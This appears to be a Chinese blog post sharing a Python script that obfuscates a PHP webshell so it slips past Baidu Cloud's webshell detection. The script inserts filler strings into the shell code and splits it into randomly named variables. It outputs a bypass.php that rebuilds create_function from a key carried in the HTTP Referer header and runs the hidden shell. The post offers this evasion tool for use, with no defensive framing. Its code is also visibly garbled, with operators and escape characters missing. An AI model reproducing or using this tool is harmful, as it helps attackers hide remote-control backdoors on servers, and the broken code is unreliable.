分享一个PHP免杀脚本 可以过百度云Webshell检测

2023-04-27 10:51:38 浏览数 (1)

过不了阿里云 原理是来自于Weevely工具

代码语言:javascript复制
#!/usr/bin/python3
import random
import string

 
#这里输自定义干扰字符
add_interfere_str='CnM' 
Referer = 'https://developer.mozilla.'  add_interfere_str  '.org/testpage.html'
notice = '//连接Referer:'   Referer 

#发送webshell时记得传Referer的值,比如:Referer: [url]https://developer.mozilla.sTr.org/testpage.html[/url],其中sTr就是干扰字符,之后过滤要用到
 
def read_check():
    open_file = open('shell.php', 'r',encoding='utf-8')  #将shell.php替换为要转换的webshell文件名
    read_file = open_file.readlines()
    file = ''.join(read_file)  
    file = file.replace("'", '"').replace('n', '').replace('t', '')
    if file.startswith('<?php'):  
        file = file.lstrip('<?php')
        file = file.rstrip('?>')
    else:
        print('这不是php代码')
    return file
 
def interfere(file):
    add_str = ''
    rest_str = ''
    num = 0
    for i in file:
        num  = 1
        if num == 3:   # 间隔3个字符输入干扰,可自行替换
            add_results = add_interfere_str.join(rest_str)
            add_str  = add_results
            rest_str = ''
            num = 0
        rest_str  = i
    add_str  = rest_str
 
 
    temp_str = ''
    array_str = []
    for i in add_str:
        num  = 1
        if num == 80: # 每隔80个字符分割字符串,可自行替换
            array_str.append(temp_str)
            temp_str = ''
            num = 0
        temp_str  = i
    array_str.append(temp_str)
    return array_str
 
def var_name(array_str):
    var_collect = []
    array_add = []
    for c in array_str:
        random_str = ''.join(random.sample(string.ascii_letters, 3))
        add_sentence = '$'   random_str   '='   "'"   c   "'"   ";"
        array_add.append(add_sentence)
        var_collect.append(random_str)
    return array_add,var_collect
 
def splicing(var_collect):
    splicing_sentence = ''
    for i in var_collect:
        var_sentence = '.'   '$'   i
        splicing_sentence  = var_sentence
    final = splicing_sentence.lstrip('.')
    return final
 
def str_print(array_add,final):
    fileName='bypass.php'
    a ='<?php'
    b = "$b =$_SERVER['HTTP_REFERER'];"
    c = "$c = explode('.',$b);"
    Tips = notice
    interfere_str = "$interfere_str =$c[2]; "
    aosp = a 'n' Tips 'n' b 'n' c 'n' interfere_str
    with open(fileName,'a',encoding='utf-8')as file:
        file.write(aosp)
        file.close()

    for i in array_add:
        with open(fileName,'a',encoding='utf-8')as file:
            file.write('n' i)
            
    file.close()
 
    #变量名为自定义,都可替换
    l = "$l"   "="   "str_replace($interfere_str,'',%s);" % (final)
    k = "$k=str_replace($interfere_str,'','cre%sat%se_fu%snc%stio%sn');" % (add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str)
    bb = "$bb = $GLOBALS['k']('',$l); "
    ee = '$GLOBALS["bb"]();'
    abvd = l 'n' k 'n' bb 'n' ee 'n' '?>'
    
    with open(fileName,'a',encoding='utf-8')as file:
        file.write(abvd)
        file.close()
 
def main():
    file = read_check()
    array_str = interfere(file)
    array_add,var_collect = var_name(array_str)
    final = splicing(var_collect)
    str_print(array_add,final)
    
if __name__ == '__main__':
    main()
php add file 百度 脚本

0 人点赞